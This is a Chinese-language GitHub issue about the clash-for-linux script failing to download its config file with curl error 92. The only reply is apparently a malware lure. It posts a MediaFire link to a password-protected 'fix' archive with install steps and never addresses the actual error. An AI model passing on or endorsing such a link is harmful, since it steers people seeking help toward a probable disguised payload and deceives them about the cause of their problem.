### ISSUE TITLE
跪求！订阅地址能访问，但是clash配置文件下载不下来

### ISSUE THREAD

**Issue by xiaoyou4264** [Elegycloud/clash-for-linux-backup#81]
正在检测订阅地址...
curl: (92) HTTP/2 stream 0 was not closed cleanly: PROTOCOL_ERROR (err 1)
Clash订阅地址可访问！                                      [  OK  ]

正在下载Clash配置文件...
curl: (92) HTTP/2 stream 0 was not closed cleanly: PROTOCOL_ERROR (err 1)

ubuntu22.04，之前安装过clash，后来直接删除文件夹了。再下载下来就这样了，一直卡在下载配置文件。

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
